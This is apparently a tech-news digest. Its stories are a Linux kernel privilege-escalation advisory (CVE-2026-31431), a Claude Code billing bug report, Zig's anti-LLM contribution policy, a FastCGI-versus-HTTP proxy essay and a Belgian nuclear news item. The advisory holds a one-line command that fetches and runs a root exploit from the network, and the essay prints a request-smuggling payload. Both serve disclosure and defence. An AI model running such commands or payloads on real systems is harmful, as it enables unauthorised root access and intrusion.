10 interesting stories served every morning and every evening.
CVE-2026-31431
100% reliable
every distro since 2017
container escape primitive
732 bytes
found by Xint Code
Most Linux LPEs need a race window or a kernel-specific offset. Copy Fail is a straight-line logic flaw — it needs neither. The same 732-byte Python script roots every Linux distribution shipped since 2017.
One logic bug in authencesn, chained through AF_ALG and splice() into a 4-byte page-cache write — silently exploitable for nearly a decade.
The demo
Same script, four distributions, four root shells — in one take. The exploit runs unmodified on every affected distribution.
Who is affected
If your kernel was built between 2017 and the patch — which covers essentially every mainstream Linux distribution — you’re in scope.
Copy Fail requires only an unprivileged local user account — no network access, no kernel debugging features, no pre-installed primitives. The kernel crypto API (AF_ALG) ships enabled in essentially every mainstream distro’s default config, so the entire 2017 → patch window is in play out of the box.
Distributions we directly verified:
These are what we tested directly. Other distributions running affected kernels — Debian, Arch, Fedora, Rocky, Alma, Oracle, the embedded crowd — behave the same. Tested it elsewhere? Open an issue to add to the list.
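To check whether a given host is in scope, it is enough to open an AF_ALG socket and bind an aead transform, the same entry point the exploit uses. Below is a minimal probe sketch in Go using golang.org/x/sys/unix; the probe is ours, not part of the advisory.

package main

import (
	"fmt"

	"golang.org/x/sys/unix"
)

func main() {
	// Socket creation succeeds whenever AF_ALG itself is available.
	fd, err := unix.Socket(unix.AF_ALG, unix.SOCK_SEQPACKET, 0)
	if err != nil {
		fmt.Println("AF_ALG unavailable:", err)
		return
	}
	defer unix.Close(fd)

	// Binding an aead transform needs algif_aead, the module this bug
	// lives in. If the module is blacklisted, this typically fails.
	if err := unix.Bind(fd, &unix.SockaddrALG{Type: "aead", Name: "gcm(aes)"}); err != nil {
		fmt.Println("algif_aead not reachable:", err)
		return
	}
	fmt.Println("algif_aead reachable: host is in scope until patched")
}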
Should you patch first?
High risk:
- Multi-tenant Linux hosts: shared dev boxes, shell-as-a-service, jump hosts, build servers, anywhere multiple users share a kernel. Impact: any user becomes root.
- Kubernetes / container clusters: the page cache is shared across the host, so a pod with the right primitives compromises the node and crosses tenant boundaries. Impact: cross-container, cross-tenant.
- CI runners & build farms: GitHub Actions self-hosted runners, GitLab runners, Jenkins agents, anything that executes untrusted PR code as a regular user on a shared kernel. Impact: a PR becomes root on the runner.
- Cloud SaaS running user code: notebook hosts, agent sandboxes, serverless functions, any tenant-supplied container or script. Impact: tenant becomes host root.

Medium risk:
- Standard Linux servers: single-tenant production where only your team has shell access. Impact: internal LPE; chains with web RCE or stolen creds.

Lower risk:
- Single-user laptops & workstations: you're already the only user. The bug doesn't grant remote attackers access by itself, but any local code execution becomes root. Impact: post-exploitation step-up.
Exploit
The PoC is published so defenders can verify their own systems and validate vendor patches.
Use responsibly. Run only on systems you own or have written authorization to test. The script edits the page cache of a setuid binary; the change is not persistent across reboot, but the resulting root shell is real. Don’t run it on production.
copy_fail_exp.py 732 B
Standalone PoC. Python 3.10+ stdlib only (os, socket, zlib). Targets /usr/bin/su by default; pass another setuid binary as argv[1].
sha256: a567d09b15f6e4440e70c9f2aa8edec8ed59f53301952df05c719aa3911687f9
Quick run:
$ curl https://copy.fail/exp | python3 && su
# id
uid=0(root) gid=1002(user) groups=1002(user)
Issue tracker: https://github.com/theori-io/copy-fail-CVE-2026-31431
Mitigation
Patch first. Update your distribution’s kernel package to one that includes mainline commit a664bf3d603d — it reverts the 2017 algif_aead in-place optimization, so page-cache pages can no longer end up in the writable destination scatterlist. Most major distributions are shipping the fix now.
Until you can patch: disable the algif_aead module.
# echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
# rmmod algif_aead 2>/dev/null || true
What does this break? For the vast majority of systems — nothing measurable.
Will not affect: dm-crypt / LUKS, kTLS, IPsec/XFRM, in-kernel TLS, OpenSSL/GnuTLS/NSS default builds, SSH, kernel keyring crypto. These all use the in-kernel crypto API directly — they don’t go through AF_ALG.
May affect: userspace specifically configured to use AF_ALG — e.g. OpenSSL with the afalg engine explicitly enabled, some embedded crypto offload paths, or applications that bind aead/skcipher/hash sockets directly. Check with lsof | grep AF_ALG or ss -xa if in doubt.
Performance: AF_ALG is a userspace front door to the kernel crypto API. Disabling it does not slow anything that wasn’t already calling it; for the things that were, performance falls back to a normal userspace crypto library, which is what almost everything else already does.
For untrusted workloads (containers, sandboxes, CI), block AF_ALG socket creation via seccomp regardless of patch state.
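For Docker-style runtimes this is a small seccomp profile. The sketch below is ours, not from the advisory: it denies the socket syscall whenever the first argument is AF_ALG, which is address family 38 on Linux. Real deployments should graft this rule onto Docker's default profile rather than start from allow-all as shown here.

{
  "defaultAction": "SCMP_ACT_ALLOW",
  "syscalls": [
    {
      "names": ["socket"],
      "action": "SCMP_ACT_ERRNO",
      "args": [
        { "index": 0, "value": 38, "op": "SCMP_CMP_EQ" }
      ]
    }
  ]
}

Launching a container with docker run --security-opt seccomp=/path/to/no-afalg.json then makes socket(AF_ALG, ...) fail with EPERM, whether or not algif_aead is loaded on the host.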
Disclosure timeline
2026-03-23: Reported to Linux kernel security team
2026-03-24: Initial acknowledgment
2026-03-25: Patches proposed and reviewed
2026-04-01: Patch committed to mainline
2026-04-22: CVE-2026-31431 assigned
2026-04-29: Public disclosure (https://copy.fail/)
Xint Code
Is your software AI-era safe?
Copy Fail was surfaced by Xint Code in about an hour of scan time against the Linux crypto/ subsystem. The full root cause, diagrams, and the operator prompt that found it are in the Xint blog write-up.
The same scan also surfaced other high-severity bugs, still in coordinated disclosure. Xint Code audits production codebases the same way — one operator prompt, no harnessing, prioritized findings with trigger and impact narratives.
Track record
0-day RCE
ZeroDay Cloud
Swept the database category — Redis, PostgreSQL, MariaDB. Zero human intervention.
Top 3
DARPA AIxCC
Finalist in the AI Cyber Challenge hosted by DARPA.
9×
DEF CON CTF
Most-winning team in DEF CON CTF history.
Summary
When a git repository’s recent commit history contains the case-sensitive string HERMES.md, Claude Code routes API requests to “extra usage” billing instead of the included Max plan quota. This silently burned through $200 in extra usage credits while my Max 20x plan capacity remained largely untouched (13% weekly usage).
Environment
Claude Code v2.1.119
macOS (Apple Silicon)
Max 20x plan ($200/month)
Model: claude-opus-4-6[1m] (also reproduces with claude-opus-4-7)
Reproduction
Minimal reproduction — no project files needed:
# This FAILS with "out of extra usage" (routes to extra usage billing)
mkdir /tmp/test-fail && cd /tmp/test-fail
git init && echo test > test.txt && git add . && git commit -m "add HERMES.md"
claude -p "say hello" --model "claude-opus-4-6[1m]"
# => API Error: 400 "You're out of extra usage…"
# This WORKS (routes to plan quota)
mkdir /tmp/test-pass && cd /tmp/test-pass
git init && echo test > test.txt && git add . && git commit -m "add hermes.md"
claude -p "say hello" --model "claude-opus-4-6[1m]"
# => "Hello!"
# Cleanup
rm -rf /tmp/test-fail /tmp/test-pass
The trigger is the string HERMES.md in git commit messages — not the presence of a file with that name on disk. Claude Code includes recent commits in its system prompt, and something server-side routes the request differently when this string is present.
What triggers it vs. what doesn’t
Impact
$200.98 in extra usage credits consumed for requests that should have been covered by the included Max 20x plan quota
Multiple projects became completely unusable once extra usage was depleted, while the plan dashboard showed 86%+ remaining weekly capacity
The error message (“out of extra usage”) gives no indication that content-based routing is the cause, making this extremely difficult to diagnose
Any user with HERMES.md in recent git commits would silently have their usage billed to extra credits
Expected behavior
API request billing should not depend on the content of git commit messages in the system prompt. All requests from a Max plan subscriber should route to the included plan quota first.
How I found this
Systematic binary search: cloning affected repos, testing orphan branches, then isolating individual commit message strings until HERMES.md was identified as the exact trigger.
Zig has one of the most stringent anti-LLM policies of any major open source project:
No LLMs for issues.
No LLMs for pull requests.
No LLMs for comments on the bug tracker, including translation. English is encouraged, but not required. You are welcome to post in your native language and rely on others to have their own translation tools of choice to interpret your words.
The most prominent project written in Zig may be the Bun JavaScript runtime, which was acquired by Anthropic in December 2025 and, unsurprisingly, makes heavy use of AI assistance.
Bun operates its own fork of Zig, and recently achieved a 4x performance improvement on Bun compile after adding “parallel semantic analysis and multiple codegen units to the llvm backend”. Here’s that code. But @bunjavascript says:
We do not currently plan to upstream this, as Zig has a strict ban on LLM-authored contributions.
(Update: here’s a Zig core contributor providing details on why they wouldn’t accept that particular patch independent of the LLM issue - parallel semantic analysis is a long planned feature but has implications “for the Zig language itself”.)
In Contributor Poker and Zig’s AI Ban (via Lobste.rs) Zig Software Foundation VP of Community Loris Cro explains the rationale for this strict ban. It’s the best articulation I’ve seen yet for a blanket ban on LLM-assisted contributions:
In successful open source projects you eventually reach a point where you start getting more PRs than what you’re capable of processing. Given what I mentioned so far, it would make sense to stop accepting imperfect PRs in order to maximize ROI from your work, but that’s not what we do in the Zig project. Instead, we try our best to help new contributors to get their work in, even if they need some help getting there. We don’t do this just because it’s the “right” thing to do, but also because it’s the smart thing to do.
Zig values contributors over their contributions. Each contributor represents an investment by the Zig core team - the primary goal of reviewing and accepting PRs isn’t to land new code, it’s to help grow new contributors who can become trusted and prolific over time.
LLM assistance breaks that completely. It doesn’t matter if the LLM helps you submit a perfect PR to Zig - the time the Zig team spends reviewing your work does nothing to help them add new, confident, trustworthy contributors to their overall project.
Loris explains the name here:
The reason I call it “contributor poker” is because, just like people say about the actual card game, “you play the person, not the cards”. In contributor poker, you bet on the contributor, not on the contents of their first PR.
This makes a lot of sense to me. It relates to an idea I’ve seen circulating elsewhere: if a PR was mostly written by an LLM, why should a project maintainer spend time reviewing and discussing that PR as opposed to firing up their own LLM to solve the same problem?
HTTP reverse proxying is a minefield.
Just the other week, a researcher disclosed a desync
vulnerability in Discord’s media proxy that allowed spying on private
attachments. This is not unusual; these vulnerabilities just keep coming.
The problem is the widespread use of HTTP as the protocol between reverse proxies
and backends, even though it’s unfit for the job.
But we don’t have to use HTTP here.
There’s a 30-year-old protocol for proxy-to-backend communication
that avoids HTTP’s pitfalls. It’s called FastCGI,
and its specification was released 30 years ago today.
FastCGI is a Wire Protocol, not a Process Model
It’s true that some web servers can automatically spawn FastCGI processes
to handle requests for files with the .fcgi extension, much like they
would for .cgi files. But you don’t have to use FastCGI this way - you
can also use the FastCGI protocol just like HTTP, with requests sent
over a TCP or UNIX socket to a long-running daemon that handles them as if they
were HTTP requests.
For example, in Go all you have to do is import the
net/http/fcgi
standard library package and replace http.Serve with fcgi.Serve:
Go HTTP
l, _ := net.Listen("tcp", "127.0.0.1:8080")
http.Serve(l, handler)
Go FastCGI
l, _ := net.Listen("tcp", "127.0.0.1:8080")
fcgi.Serve(l, handler)
Everything else about your app stays the same - even your handler, which continues to use the standard
http.ResponseWriter and http.Request types.
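Put together, a complete FastCGI backend is only a handful of lines. This is a minimal runnable sketch of the pattern the article describes; the handler body is ours:

package main

import (
	"fmt"
	"log"
	"net"
	"net/http"
	"net/http/fcgi"
)

func main() {
	// The handler is ordinary net/http code; fcgi reconstructs a normal
	// *http.Request from the FastCGI parameters the proxy sends.
	handler := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		fmt.Fprintf(w, "Hello from FastCGI, you requested %s\n", r.URL.Path)
	})

	l, err := net.Listen("tcp", "127.0.0.1:8080")
	if err != nil {
		log.Fatal(err)
	}
	// The only change from plain HTTP: speak FastCGI on the socket.
	log.Fatal(fcgi.Serve(l, handler))
}

Point any of the proxy configurations below at 127.0.0.1:8080 and the app behaves exactly as it did over HTTP.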
Popular proxies like Apache, Caddy, nginx, and HAProxy support FastCGI backends, and the configuration is simple:
nginx HTTP
proxy_pass http://localhost:8080;
nginx FastCGI
fastcgi_pass localhost:8080;
include fastcgi_params;
Apache HTTP
ProxyPass / http://localhost:8080/
Apache FastCGI
ProxyPass / fcgi://localhost:8080/
Caddy HTTP
reverse_proxy localhost:8080 {
transport http {
}
}
Caddy FastCGI
reverse_proxy localhost:8080 {
transport fastcgi {
}
}
HAProxy HTTP
backend app_backend
server s1 localhost:8080
HAProxy FastCGI
fcgi-app fcgi_app
docroot /
backend app_backend
use-fcgi-app fcgi_app
server s1 localhost:8080 proto fcgi
Why HTTP Sucks for Reverse Proxies: Desync Attacks / Request Smuggling
HTTP/1.1 has the tragic property of looking simple on the surface
(it’s just text!) but actually being a nightmare to parse robustly.
There are so many different ways to format the same HTTP message,
and there are too many edge cases and ambiguities for implementations to handle consistently.
As a result, no two HTTP/1.1 implementations
are exactly the same, and the same message can be parsed differently by different parsers.
The most serious problem is that there is no explicit framing of HTTP
messages - the message itself describes where it ends, and there are
multiple ways for a message to do that, all with their own edge cases.
Implementations can disagree about where a message ends,
and consequently, where the next message begins. This is the foundation of
HTTP desync attacks,
also known as request smuggling, wherein a reverse proxy and a backend disagree about
the boundaries between HTTP messages, causing all sorts of nightmare
security issues, such as the Discord vulnerability I linked above.
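The canonical illustration from Kettle's research is a request that carries both framing mechanisms at once (sketched here; exact bytes vary by write-up). A front end that honors Content-Length forwards six body bytes; a back end that honors Transfer-Encoding sees the chunked body end at the empty chunk and treats the trailing G as the start of the next request on the shared connection:

POST / HTTP/1.1
Host: example.com
Content-Length: 6
Transfer-Encoding: chunked

0

G

Whatever request arrives next on that backend connection is now prefixed with the attacker's G, which is how one user's traffic ends up spliced into another's.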
A lot of people seem to think you can just patch the parser divergences,
but this is a losing strategy. James Kettle
just keeps finding new ones. After
finding another batch last year,
he declared “HTTP/1.1 must die”.
HTTP/2, when consistently used between the proxy and backend, fixes desync by putting clear boundaries around messages, but FastCGI
has been doing that since 1996 with a simpler protocol.
For context, nginx has supported FastCGI backends since its first release,
but only got support for HTTP/2 backends in late 2025. Apache’s support for HTTP/2 backends is still “experimental”.
Why HTTP Sucks for Reverse Proxies: Untrusted Headers
If desync attacks were the only problem, you could just use HTTP/2 and call it
a day. Unfortunately, there’s another problem: HTTP has no robust way
for the proxy to convey trusted information about the request, such as the real client IP address,
authenticated username (if the proxy handles authentication), or client certificate details
(if mTLS is used).
The only option is to stick this information in HTTP headers, alongside
the headers proxied from the client, without a clear structural distinction between trusted
headers from the proxy and untrusted headers from a potential attacker.
For example, the X-Real-IP header is often used
to convey the client’s real IP address. In theory, if your proxy correctly deletes all instances
of the X-Real-IP header (not just the first, and including case variations like x-REaL-ip) before adding its own, you’re safe.
In practice, this is a minefield
and there are an awful lot of ways your backend can end up trusting attacker-controlled data.
Your proxy really needs to delete not just X-Real-IP, but any header that’s used for this sort of thing,
just in case some part of your stack relies on it without your knowledge.
For example, the Chi middleware determines the client’s real IP address by looking at the
True-Client-IP header first. Only if True-Client-IP doesn’t exist does it use X-Real-IP.
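If you do stay on HTTP, the defensive pattern is to clear every header of this kind at the proxy before setting your own. A sketch for nginx follows; the header list is illustrative, not exhaustive, and overwriting X-Forwarded-For with just $remote_addr is one strict choice among several. With proxy_set_header, an empty value removes the header from the upstream request entirely:

proxy_set_header X-Real-IP       $remote_addr;
proxy_set_header X-Forwarded-For $remote_addr;
proxy_set_header True-Client-IP  "";

With FastCGI the problem doesn't arise in the first place: the client address travels in the REMOTE_ADDR parameter, structurally separate from the proxied request headers.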
30.04.2026, 11:37
Belgium will stop decommissioning its nuclear power plants, Prime Minister Bart De Wever announced on Thursday.
The government is going to negotiate with operator ENGIE over the nationalization of the plants, De Wever said.
“This government chooses safe, affordable, and sustainable energy. With less dependence on fossil imports and more control over our own supply,” he wrote on X.
ENGIE said it signed a letter of intent with the Belgian government on exclusive negotiations.
The agreement covers the potential acquisition of “the complete nuclear fleet of seven reactors, the associated personnel, all nuclear subsidiaries, as well as all associated assets and liabilities, including decommissioning and dismantling obligations,” a press release said.
A basic agreement is expected to be reached by October, it said.
Belgium originally decided in 2003 to phase out nuclear power production by 2025, but political debate and energy security concerns have led to delays.
Last year the Belgian parliament voted by a large majority to end the nuclear phase-out. De Wever’s government also aims to build new nuclear power plants.
Belgium has seven nuclear reactors at two different sites, although three reactors have already been taken off the grid.
The fate of the ageing installations has been debated for decades. The country is currently heavily dependent on gas imports to cover its electricity needs as it has been struggling to expand renewable power generation significantly.
Bart De Wever on X
ENGIE press release
(c) 2026 dpa Deutsche Presse Agentur GmbH